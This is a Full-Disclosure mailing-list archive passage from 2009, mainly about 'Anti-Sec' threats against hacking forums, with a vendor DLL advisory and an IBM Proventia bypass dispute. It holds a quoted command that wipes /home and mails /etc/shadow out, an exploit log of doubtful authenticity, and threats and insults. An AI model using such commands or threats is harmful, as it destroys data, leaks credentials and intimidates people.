[Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered
Hey she...@fd, Stop being scared about theses kids, they fucking sucks! you shoudn't have taken LSD, makes you paranoid even 7 years later, i guess u guys should consult a doctor. @anti-sec_kids: This is my server : http://207.182.131.158/index.html Hack it, and i'll stfu. While waiting your l33t-prick hack, @reverseDNS on unsecur shared-webhoster, no wonder i'll laught @you. Die in a fire kids. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered
anti-scared- sheep wrote: Hey she...@fd, Stop being scared about theses kids, they fucking sucks! you shoudn't have taken LSD, makes you paranoid even 7 years later, i guess u guys should consult a doctor. @anti-sec_kids: This is my server : http://207.182.131.158/index.html Hack it, and i'll stfu. While waiting your l33t-prick hack, @reverseDNS on unsecur shared-webhoster, no wonder i'll laught @you. Die in a fire kids. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Really feelin the font dude. Nice site :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered
lol, what makes you think they will fall for it? On Thu, Jul 16, 2009 at 9:01 AM, anti-scared- sheep securyourbr...@gmail.com wrote: Hey she...@fd, Stop being scared about theses kids, they fucking sucks! you shoudn't have taken LSD, makes you paranoid even 7 years later, i guess u guys should consult a doctor. @anti-sec_kids: This is my server : http://207.182.131.158/index.html Hack it, and i'll stfu. While waiting your l33t-prick hack, @reverseDNS on unsecur shared-webhoster, no wonder i'll laught @you. Die in a fire kids. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered
webDEViL wrote: lol, what makes you think they will fall for it? On Thu, Jul 16, 2009 at 9:01 AM, anti-scared- sheep securyourbr...@gmail.com mailto:securyourbr...@gmail.com wrote: Hey she...@fd, Stop being scared about theses kids, they fucking sucks! you shoudn't have taken LSD, makes you paranoid even 7 years later, i guess u guys should consult a doctor. @anti-sec_kids: This is my server : http://207.182.131.158/index.html Hack it, and i'll stfu. While waiting your l33t-prick hack, @reverseDNS on unsecur shared-webhoster, no wonder i'll laught @you. Die in a fire kids. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ they're super leet and have to prove it ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] seriously, your code
Hi, /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehecat /etc/shadow |mail full-disclosure@lists.grok.org.uk cat /etc/passwd |mail full-disclosure@lists.grok.org.uk first off if you want to do damage rm -R dumb ass, the one you posted only removes files in /home perhaps it was *designed* to only delete files from /home = because if you did a full recursive nasty delete of the whole filesystem then , not only would there not be a /etc/shadow to mail out, but also the mail command would not work - and if, by miracle, the command did work then the mail wouldnt go anywhere because the mailspool dir would not exist etcand if, by some crazy broken-system way anything ever did get off the box, then there wouldnt actually be a box worth logging into remotely using any credentials that might be in /etc/shadow anyway ;-) alan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Anti-Sec - We have terminated blackhat-forums.com. Are you scared now Hackforums.net?
Blend in. Get trusted. Trust no one. Own everyone. Disclose nothing. Destroy everything. Take back the scene. Never sell out, never surrender. Get in as anonymous, Leave with no trace. -- Dear Jesse Labrocca (Omniscient) and Hackforums.net, The Anti-Sec movement has officially terminated Blackhat-forums.com using yet ANOTHER 0-day exploit that we have discovered. This one takes advantage of a previously undisclosed LiteSpeed vulnerability. This is primarily to prove that we are serious and committed to our primary goal - eradicating full-disclosure of computer vulnerabilities and exploits, and terminating general discussion of hacking for any n00b and script-kiddie to read and review - and learn from. The Anti-Sec movement hopes Hackrforums.net now understands that our cyber war against you is NOT a joke. We will be terminating Hackforums.net. You are our number one target...we want to savor the moment and the suspense. We will strike when you least expect it. This we promise. Here is a brief transcript of the hacking of Blackhat-forums.com: - anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com -p80 [+] Connecting to blackhat-forums.com:80 [+] Connected Successfully! [+] Checking for Lightspeed vulnerability... [+] Vulnerable! [+] Sending exploit [-] Phase 1 [-] Phase 2 [-] Phase 3 [+] Injecting Shellcode... [+] Waiting for reverse shell... [~] Connected to shell @ 74.86.203.65! snip uid=0(root) gid=0 (root) groups=0 (root) snip --- By terminating Blackhat-forums.com, we have furthered our goals in more ways than one. We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which will cause a major blow to those who support full-disclosure of hacking related information. Take out two birds with one stone. Sincerely, -anti-sec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerable DLLs distributed with Terratec HomeCinema 6.3
Once again a sad story of poor software engineering, missing QA and a TOTALLY unresponsive vendor. The current version 6.3 of Terratec's TV software HomeCinema http://ftp.terratec.de/Receiver/TerraTec_HomeCinema/TerraTec_Home_Cinema_6.3.exe from 2009-05-05 installs outdated and vulnerable .DLLs (the test system used is a fully patched german Windows XP SP3): 1. Version 1.2.2 of ZLIB1.DLL is installed as %ProgramFiles%\TerraTec\TerraTec HomeCinema\zlib1.dll. Current since 2005-07-18 is version 1.2.3 of ZLIB1.DLL (see http://zlib.org/): | Version 1.2.3 eliminates potential security vulnerabilities in | zlib 1.2.1 and 1.2.2, so all users of those versions should | *upgrade* *immediately*. 2. Version 5.1.3102.2180 of Microsoft's GDIPLUS.DLL is installed as %SystemRoot%\SYSTEM32\GDIPLUS.DLL. The current version of GDIPLUS.DLL for Windows XP SP3 is 5.1.3102.5512, which is already part of the system and installed into Windows' side-by-side cache under %SystemRoot%\WinSxS\! According the MSDN GDIPLUS.DLL MUST NOT be installed into %SystemRoot%\SYSTEM32\, and DLLs distributed with Windows MUST NOT be redistributed by ISVs. In addition see the MSFT security bulletin MS08-052 http://www.microsoft.com/technet/security/bulletin/MS08-052.mspx as well as the MSFT knowledge base article 954593 http://support.microsoft.com/kb/954593/en-us. 3. The DLLs of the current version of the component MSXML4 SP2 are installed to %SystemRoot%\SYSTEM32\. This component is but not installed from the redistributable package provided by Microsoft that ISVs have to use to meet the legal mumbo-jumbo, instead Terratec choose to repackage the DLLs into an NSIS installer, thus violating MSFTs redistribution policy. (Un)fortunately this NSIS installer is flawed and does not perform all the necessary steps needed for a clean installation of MSXML4 SP2, so Microsoft Update detects the MSXML4 SP2 installation as outdated/incomplete and fetches the current patch installer (http://support.microsoft.com/kb/954430/en-us, http://www.microsoft.com/technet/security/bulletin/MS08-069.mspx) to repair it. The best of all: MSXML4 is NOT referenced at all by the installed application CynergyDVR.EXE, which but uses XMLLITE.DLL (http://support.microsoft.com/kb/915865/en-us) instead. 4. A superfluous pthreadVC2.dll is installed as %CommonProgramFiles%\TerraTec\Cyberlink\Decoder\pthreadVC2.dll Stefan Kanthak PS: Tools like Secunia's PSI don't detect such outdated and vulnerable DLLs. Admin beware! TIMELINE: 2009-06-16 phone call with Terratec's hotline - they were unable to take any action, but requested to send report per mail 2009-06-17 sent mail to Terratec - no response 2009-06-30 resent mail to Terratec - again no response 2009-07-16 report published ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ANT-SEC
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
____ _
/ | / | / /_ __/ / ___// / /
/ /| | / |/ / / /_\__ \/ __/ / /
/ ___ |/ /| / / /_/__/ / /___/ /___
/_/ |_/_/ |_/ /_/ //_/\/
WE ARE DEDICATED TO THE ERADICATION OF ANY WHITE HAT ANTS,
WHITE HAT TERMITES, WHITE SHEETS, ANYTHING THAT STIMULATES
ALL THREE TYPES OF COLOR SENSITIVE CONE CELLS IN
THE HUMAN EYE
WE HAVE THE ABILITY TO USE FIGLET
WE HAVE THE ABILITY TO USE VI TO CREATE FAKE EXPLOIT LOGS
WE ARE PROBABLY SOME FAGGY 4-CHAN ANONYMOUS LEGION CUNTS
WE ARE NOT ORGANISED INTO CELLS. WE DO NOT HAVE A GANG OR A
CREW OR A HIVE. WE HAVE A WHOLE FUCKING COLONY DEEP UNDERGROUND
IN PLACES YOU DONT EVEN KNOW CAN EXIST.
# ./1tf33lzb1gg3rth3n1tl00kztrustm3b4by
1) Fake exploit
2) gay pr0n
3) ascii ant
3
YEAH TAKE IT TAKE IT BITCH, WHAT, YES, OH, YES IT IS IN :(
\ /
\ /
\.-./
(o\^/o) _ _ _ __
./ \.\ ( )-( )-( ) .-' '-.
{-} \(// || \\/ ( )) '-.
//-__||__.-\\. .-'
(/() \)'-._.-'
|||| \\
MJP ('(' ')
NOW YOU HAVE SEEN A SMALL PORTION OF OUR POWER
PRAY YOU DO NOT MAKE US USE IT AGAIN
Signed: The ANT-sec Movement
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify
wpwEAQMCAAYFAkpexU8ACgkQLWyFdv6TrmVz3AP/Vn8E+i/gUi3lKRwBTyZZ6BhnOnZ2
9m6GiOWWLXkCHNSHnIMenn+4N48BOQhsrUR+V5dCSFwIpAzvzQlARFI2qVfrHIMhbAdJ
FoAg0U+VNUg8kKwa7deLR1bPQVl6KGu0PlmcD8QnHDRK/jdijw3abGebp/3IadjyhFUP
LIEjqaM=
=yUnN
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?
Blend in. Get trusted. Trust no one. Own everyone. Disclose nothing. Destroy everything. Take back the scene. Never sell out, never surrender. Get in as anonymous, Leave with no trace. -- Dear Jesse Labrocca (Omniscient) and Hackforums.net, The Anti-Sec movement has officially terminated Blackhat-forums.com using yet ANOTHER 0-day exploit that we have discovered. This one takes advantage of a previously undisclosed LiteSpeed vulnerability. This is primarily to prove that we are serious and committed to our primary goal - eradicating full-disclosure of computer vulnerabilities and exploits, and terminating general discussion of hacking for any n00b and script-kiddie to read and review - and learn from. The Anti-Sec movement hopes Hackrforums.net now understands that our cyber war against you is NOT a joke. We will be terminating Hackforums.net. You are our number one target...we want to savor the moment and the suspense. We will strike when you least expect it. This we promise. Here is a brief transcript of the hacking of Blackhat-forums.com: - anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com -p80 [+] Connecting to blackhat-forums.com:80 [+] Connected Successfully! [+] Checking for Lightspeed vulnerability... [+] Vulnerable! [+] Sending exploit [-] Phase 1 [-] Phase 2 [-] Phase 3 [+] Injecting Shellcode... [+] Waiting for reverse shell... [~] Connected to shell @ 74.86.203.65! snip uid=0(root) gid=0 (root) groups=0 (root) snip --- By terminating Blackhat-forums.com, we have furthered our goals in more ways than one. We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which will cause a major blow to those who support full-disclosure of hacking related information. Take out two birds with one stone. Sincerely, -anti-sec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?
Seriously, you're as delusional as these radical movements who blow up buildings and kill people preaching how they feel the West is wrong and old ways are best. I see a lot of parallels between them and you. You need help, you need a new hobby. Taking down these sites is as productive as masturbation. It feels good yes, but is it really that satisfying? Nevermind that, you will do what you think is in your movement's best interest. Regardless, I wish you well in your endeavors. Hope the FBI talk to you eventually as you're infringing on the first amendment :) Ant-Sec Movement wrote: Blend in. Get trusted. Trust no one. Own everyone. Disclose nothing. Destroy everything. Take back the scene. Never sell out, never surrender. Get in as anonymous, Leave with no trace. -- Dear Jesse Labrocca (Omniscient) and Hackforums.net, The Anti-Sec movement has officially terminated Blackhat-forums.com using yet ANOTHER 0-day exploit that we have discovered. This one takes advantage of a previously undisclosed LiteSpeed vulnerability. This is primarily to prove that we are serious and committed to our primary goal - eradicating full-disclosure of computer vulnerabilities and exploits, and terminating general discussion of hacking for any n00b and script-kiddie to read and review - and learn from. The Anti-Sec movement hopes Hackrforums.net now understands that our cyber war against you is NOT a joke. We will be terminating Hackforums.net. You are our number one target...we want to savor the moment and the suspense. We will strike when you least expect it. This we promise. Here is a brief transcript of the hacking of Blackhat-forums.com: - anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com http://blackhat-forums.com -p80 [+] Connecting to blackhat-forums.com:80 http://blackhat-forums.com:80 [+] Connected Successfully! [+] Checking for Lightspeed vulnerability... [+] Vulnerable! [+] Sending exploit [-] Phase 1 [-] Phase 2 [-] Phase 3 [+] Injecting Shellcode... [+] Waiting for reverse shell... [~] Connected to shell @ 74.86.203.65! snip uid=0(root) gid=0 (root) groups=0 (root) snip --- By terminating Blackhat-forums.com, we have furthered our goals in more ways than one. We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which will cause a major blow to those who support full-disclosure of hacking related information. Take out two birds with one stone. Sincerely, -anti-sec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?
The Anti-Sec movement is not just one person. We are a group of people from all over the world. We are almost a culture unto ourselves. We are threaded throughout the spokes of everyday life. We have committed no crimes - our endeavors will ultimately cut down computer crime to some degree. The amount of innocent people getting hit with financial losses as a result of malicious computer hacking will decrease significantly because hacker communities like Blackhat-forums and Astalavista have been terminated - or at least for a time, which is still a gain. This is ultimately a hacker war. Furthermore, the Poster of this message is merely a standard bearer of a faction of the Anti-Sec Movement. The Poster of this message is not a hacker, but is merely reporting the movements of Anti-Sec. Sincerely, -anti-sec Please check out our website at: http://romeo.copyandpaste.info/ On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance cance.consult...@gmail.comwrote: Seriously, you're as delusional as these radical movements who blow up buildings and kill people preaching how they feel the West is wrong and old ways are best. I see a lot of parallels between them and you. You need help, you need a new hobby. Taking down these sites is as productive as masturbation. It feels good yes, but is it really that satisfying? Nevermind that, you will do what you think is in your movement's best interest. Regardless, I wish you well in your endeavors. Hope the FBI talk to you eventually as you're infringing on the first amendment :) Ant-Sec Movement wrote: Blend in. Get trusted. Trust no one. Own everyone. Disclose nothing. Destroy everything. Take back the scene. Never sell out, never surrender. Get in as anonymous, Leave with no trace. -- Dear Jesse Labrocca (Omniscient) and Hackforums.net, The Anti-Sec movement has officially terminated Blackhat-forums.com using yet ANOTHER 0-day exploit that we have discovered. This one takes advantage of a previously undisclosed LiteSpeed vulnerability. This is primarily to prove that we are serious and committed to our primary goal - eradicating full-disclosure of computer vulnerabilities and exploits, and terminating general discussion of hacking for any n00b and script-kiddie to read and review - and learn from. The Anti-Sec movement hopes Hackrforums.net now understands that our cyber war against you is NOT a joke. We will be terminating Hackforums.net. You are our number one target...we want to savor the moment and the suspense. We will strike when you least expect it. This we promise. Here is a brief transcript of the hacking of Blackhat-forums.com: - anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com http://blackhat-forums.com -p80 [+] Connecting to blackhat-forums.com:80 http://blackhat-forums.com:80 [+] Connected Successfully! [+] Checking for Lightspeed vulnerability... [+] Vulnerable! [+] Sending exploit [-] Phase 1 [-] Phase 2 [-] Phase 3 [+] Injecting Shellcode... [+] Waiting for reverse shell... [~] Connected to shell @ 74.86.203.65! snip uid=0(root) gid=0 (root) groups=0 (root) snip --- By terminating Blackhat-forums.com, we have furthered our goals in more ways than one. We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which will cause a major blow to those who support full-disclosure of hacking related information. Take out two birds with one stone. Sincerely, -anti-sec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Update: [TZO-06-2009] IBM Proventia - Generic bypass (Limited disclosure - see details)
Thierry, I think inability of antivirus / intrusion detection to catch something that is not malware/intrusion or malware in the form unused in-the-wild is not vulnerability. Antivirus (generally) gives no preventive protection. They can add signatures for your PoCs to their database - and that's how it works. --Thursday, July 16, 2009, 12:02:35 AM, you wrote to bugt...@securityfocus.com: TZ As I received a lot of feedback on this bug, I thought I'd update you. After not replying TZ to my notifications and subsequent forced partial disclosure, IBM stated TZ officially on their website that they where not affected and to my surprise TZ IBM got in contact immediately after disclosure to coordinate TZ If your read the Timeline till the end, the story has a nice swing.., Drama, insults, TZ everything. You could make a soap opera out of it. And you don't even have all the mails. TZ What happened during this coordination even surprised myself. I am used to discussions, TZ I am used to stupid answers. However what happened here bears no description. TZ Short Guerilla Version of the Timeline (complete timeline below): TZ --- TZ - Hey Thierry sorry, we did not get your report, we'll keep you updated! TZ We have IBM written on the proventia boxes but don't send reports to IBM!! TZ - Post official statement to IBM website that IBM is NOT affected and TZ forgetting to inform Thierry TZ - Thierry, You cannot evade proventia, because we use special propretary TZ ingredients! What are these ingredients? TZ - We won't tell !! and by the way you suck! your test methods suck! You aren't even TZ EAL2 ! A test team costs too much to tests your POCs! Your mails suck! Learn from TZ the big mighty IBM. Sorry, the same poc evaded proventia last year! So you mus miss something!! TZ - Thierry, stop sending us POC files, YOU CANNOT EVADE PROVENTIA, IT is TZ IMPOSSIBLE, IRREVQUABLE, PERIOD Silence TZ - Thierry here is our report, you DID evade all our proventia products, we will TZ credit you. TZ In the timeline below you find my summary TZ - TZ 02.04.2009 - Forced partial disclose TZ 02.04.2009 - An known contact at IBM asks for the POC TZ 02.04.2009 - POC is resend TZ 02.04.2009 - An third person is added to the coordination list TZ 04.04.2009 - Sending another POC file (RAR) TZ 06.04.2009 - POC is acknowledged and promise is made to get back TZ once the material has been analysed. TZ 10.04.2009 - Sending another POC file (ZIP) TZ 10.04.2009 - The third person ergo the Cyber TZ Incident Vulnerability Handling PM is taking over coorindation TZ 14.04.2009 - A comment was made to my blog that indicated IBM did TZ answer the Bugtraq posting and negate my findings, having TZ received no response from them personaly I ask TZ Dear Peter, I was refered to this url in a comment posted to my blog: TZ http://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_faqid=5417 TZ can you confirm this ? TZ 15.04.2009 - IBM responds: TZ [..] we TZ apologize that the path of communicating the disclosure was somewhat TZ confusing. [..] The IBM contact address in the TZ OSVDB is typically used for software products that are in another division TZ of IBM, and thus, your report was not routed to us in a timely manner. In TZ the future, we'd prefer that you contact myself directly TZ We have now investigated the TZO-04-2009-IBM incident you reported and have TZ found that we are not susceptible to this evasion. TZ [..]in this case, there are other components in our Proventia TZ products that prevent this evasion from occurring TZ Testing our production products, rather than testing this one TZ piece of our technology, then you would have been able to see the same TZ results TZ 16.04.2009 - As my tests indicate otherwise I ask Could you please TZ specify which components would prevent the evasion, as it is TZ hard to see how to prevent it when the unarchiver code cannot extract TZ the code itself and TZ I would be glad to do so [Red:test production products] : TZ Please send the respective appliances to my adress TZ 16.04.2009 - IBM answers TZ [..] We are not an open source company, so the internal workings of TZ our proprietary software is not something we publicly disclose. TZ We do not provide our products for free to all of the independent TZ testers that might be interested in our product lines--the number TZ of requests simply would not be scalable or manageable if TZ we did TZ 17.04.2009 - As I have no way to reproduce and IBM gives no details TZ about their OH-SO Secret propretary software I state that TZ I cannot verify nor reproduce your statements as such I will leave TZ this CVE entry as disputed. Please provide tangible proof that TZ you detect the samples. Screenshots, logs, outputs. TZ AND TZ My worktime is not open source either[..]
Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?
n3td3v? iz that u? lying again? do i need 2 bust u out? On Thu, Jul 16, 2009 at 6:00 AM, Ant-Sec Movementanti.sec.movem...@gmail.com wrote: The Anti-Sec movement is not just one person. We are a group of people from all over the world. We are almost a culture unto ourselves. We are threaded throughout the spokes of everyday life. We have committed no crimes - our endeavors will ultimately cut down computer crime to some degree. The amount of innocent people getting hit with financial losses as a result of malicious computer hacking will decrease significantly because hacker communities like Blackhat-forums and Astalavista have been terminated - or at least for a time, which is still a gain. This is ultimately a hacker war. Furthermore, the Poster of this message is merely a standard bearer of a faction of the Anti-Sec Movement. The Poster of this message is not a hacker, but is merely reporting the movements of Anti-Sec. Sincerely, -anti-sec Please check out our website at: http://romeo.copyandpaste.info/ On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance cance.consult...@gmail.com wrote: Seriously, you're as delusional as these radical movements who blow up buildings and kill people preaching how they feel the West is wrong and old ways are best. I see a lot of parallels between them and you. You need help, you need a new hobby. Taking down these sites is as productive as masturbation. It feels good yes, but is it really that satisfying? Nevermind that, you will do what you think is in your movement's best interest. Regardless, I wish you well in your endeavors. Hope the FBI talk to you eventually as you're infringing on the first amendment :) Ant-Sec Movement wrote: Blend in. Get trusted. Trust no one. Own everyone. Disclose nothing. Destroy everything. Take back the scene. Never sell out, never surrender. Get in as anonymous, Leave with no trace. -- Dear Jesse Labrocca (Omniscient) and Hackforums.net, The Anti-Sec movement has officially terminated Blackhat-forums.com using yet ANOTHER 0-day exploit that we have discovered. This one takes advantage of a previously undisclosed LiteSpeed vulnerability. This is primarily to prove that we are serious and committed to our primary goal - eradicating full-disclosure of computer vulnerabilities and exploits, and terminating general discussion of hacking for any n00b and script-kiddie to read and review - and learn from. The Anti-Sec movement hopes Hackrforums.net now understands that our cyber war against you is NOT a joke. We will be terminating Hackforums.net. You are our number one target...we want to savor the moment and the suspense. We will strike when you least expect it. This we promise. Here is a brief transcript of the hacking of Blackhat-forums.com: - anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com http://blackhat-forums.com -p80 [+] Connecting to blackhat-forums.com:80 http://blackhat-forums.com:80 [+] Connected Successfully! [+] Checking for Lightspeed vulnerability... [+] Vulnerable! [+] Sending exploit [-] Phase 1 [-] Phase 2 [-] Phase 3 [+] Injecting Shellcode... [+] Waiting for reverse shell... [~] Connected to shell @ 74.86.203.65! snip uid=0(root) gid=0 (root) groups=0 (root) snip --- By terminating Blackhat-forums.com, we have furthered our goals in more ways than one. We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which will cause a major blow to those who support full-disclosure of hacking related information. Take out two birds with one stone. Sincerely, -anti-sec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Update: [TZO-06-2009] IBM Proventia - Generic bypass (Limited disclosure - see details)
Hi Vladimir, Please understand that I will not enter that discussion any longer. Please note that : V3D is not malware/intrusion or malware in the form unused in-the-wild V3D is not vulnerability. Is false. It is recognised malware, else the test woulnd't make sense - obviously. Regards, Thierry V3D Thierry, V3D I think inability of antivirus / intrusion detection to catch something V3D that is not malware/intrusion or malware in the form unused in-the-wild V3D is not vulnerability. Antivirus (generally) gives no preventive V3D protection. They can add signatures for your PoCs to their database - V3D and that's how it works. V3D --Thursday, July 16, 2009, 12:02:35 AM, you wrote to bugt...@securityfocus.com: TZ As I received a lot of feedback on this bug, I thought I'd update you. After not replying TZ to my notifications and subsequent forced partial disclosure, IBM stated TZ officially on their website that they where not affected and to my surprise TZ IBM got in contact immediately after disclosure to coordinate TZ If your read the Timeline till the end, the story has a nice swing.., Drama, insults, TZ everything. You could make a soap opera out of it. And you don't even have all the mails. TZ What happened during this coordination even surprised myself. I am used to discussions, TZ I am used to stupid answers. However what happened here bears no description. TZ Short Guerilla Version of the Timeline (complete timeline below): TZ --- TZ - Hey Thierry sorry, we did not get your report, we'll keep you updated! TZ We have IBM written on the proventia boxes but don't send reports to IBM!! TZ - Post official statement to IBM website that IBM is NOT affected and TZ forgetting to inform Thierry TZ - Thierry, You cannot evade proventia, because we use special propretary TZ ingredients! What are these ingredients? TZ - We won't tell !! and by the way you suck! your test methods suck! You aren't even TZ EAL2 ! A test team costs too much to tests your POCs! Your mails suck! Learn from TZ the big mighty IBM. Sorry, the same poc evaded proventia last year! So you mus miss something!! TZ - Thierry, stop sending us POC files, YOU CANNOT EVADE PROVENTIA, IT is TZ IMPOSSIBLE, IRREVQUABLE, PERIOD Silence TZ - Thierry here is our report, you DID evade all our proventia products, we will TZ credit you. TZ In the timeline below you find my summary TZ - TZ 02.04.2009 - Forced partial disclose TZ 02.04.2009 - An known contact at IBM asks for the POC TZ 02.04.2009 - POC is resend TZ 02.04.2009 - An third person is added to the coordination list TZ 04.04.2009 - Sending another POC file (RAR) TZ 06.04.2009 - POC is acknowledged and promise is made to get back TZ once the material has been analysed. TZ 10.04.2009 - Sending another POC file (ZIP) TZ 10.04.2009 - The third person ergo the Cyber TZ Incident Vulnerability Handling PM is taking over coorindation TZ 14.04.2009 - A comment was made to my blog that indicated IBM did TZ answer the Bugtraq posting and negate my findings, having TZ received no response from them personaly I ask TZ Dear Peter, I was refered to this url in a comment posted to my blog: TZ http://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_faqid=5417 TZ can you confirm this ? TZ 15.04.2009 - IBM responds: TZ [..] we TZ apologize that the path of communicating the disclosure was somewhat TZ confusing. [..] The IBM contact address in the TZ OSVDB is typically used for software products that are in another division TZ of IBM, and thus, your report was not routed to us in a timely manner. In TZ the future, we'd prefer that you contact myself directly TZ We have now investigated the TZO-04-2009-IBM incident you reported and have TZ found that we are not susceptible to this evasion. TZ [..]in this case, there are other components in our Proventia TZ products that prevent this evasion from occurring TZ Testing our production products, rather than testing this one TZ piece of our technology, then you would have been able to see the same TZ results TZ 16.04.2009 - As my tests indicate otherwise I ask Could you please TZ specify which components would prevent the evasion, as it is TZ hard to see how to prevent it when the unarchiver code cannot extract TZ the code itself and TZ I would be glad to do so [Red:test production products] : TZ Please send the respective appliances to my adress TZ 16.04.2009 - IBM answers TZ [..] We are not an open source company, so the internal workings of TZ our proprietary software is not something we publicly disclose. TZ We do not provide our products for free to all of the independent TZ testers that might be interested in our product lines--the number TZ of requests simply would not be scalable or manageable if TZ we did TZ 17.04.2009 - As I have no
Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?
-[u a *Rules of Engagement*: Don't get too cocky. Don't underestimate anyone. These frequent posts sound as if you are in violation of your own RoE. Ureleet wrote: n3td3v? iz that u? lying again? do i need 2 bust u out? On Thu, Jul 16, 2009 at 6:00 AM, Ant-Sec Movementanti.sec.movem...@gmail.com wrote: The Anti-Sec movement is not just one person. We are a group of people from all over the world. We are almost a culture unto ourselves. We are threaded throughout the spokes of everyday life. We have committed no crimes - our endeavors will ultimately cut down computer crime to some degree. The amount of innocent people getting hit with financial losses as a result of malicious computer hacking will decrease significantly because hacker communities like Blackhat-forums and Astalavista have been terminated - or at least for a time, which is still a gain. This is ultimately a hacker war. Furthermore, the Poster of this message is merely a standard bearer of a faction of the Anti-Sec Movement. The Poster of this message is not a hacker, but is merely reporting the movements of Anti-Sec. Sincerely, -anti-sec Please check out our website at: http://romeo.copyandpaste.info/ On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance cance.consult...@gmail.com wrote: Seriously, you're as delusional as these radical movements who blow up buildings and kill people preaching how they feel the West is wrong and old ways are best. I see a lot of parallels between them and you. You need help, you need a new hobby. Taking down these sites is as productive as masturbation. It feels good yes, but is it really that satisfying? Nevermind that, you will do what you think is in your movement's best interest. Regardless, I wish you well in your endeavors. Hope the FBI talk to you eventually as you're infringing on the first amendment :) Ant-Sec Movement wrote: Blend in. Get trusted. Trust no one. Own everyone. Disclose nothing. Destroy everything. Take back the scene. Never sell out, never surrender. Get in as anonymous, Leave with no trace. -- Dear Jesse Labrocca (Omniscient) and Hackforums.net, The Anti-Sec movement has officially terminated Blackhat-forums.com using yet ANOTHER 0-day exploit that we have discovered. This one takes advantage of a previously undisclosed LiteSpeed vulnerability. This is primarily to prove that we are serious and committed to our primary goal - eradicating full-disclosure of computer vulnerabilities and exploits, and terminating general discussion of hacking for any 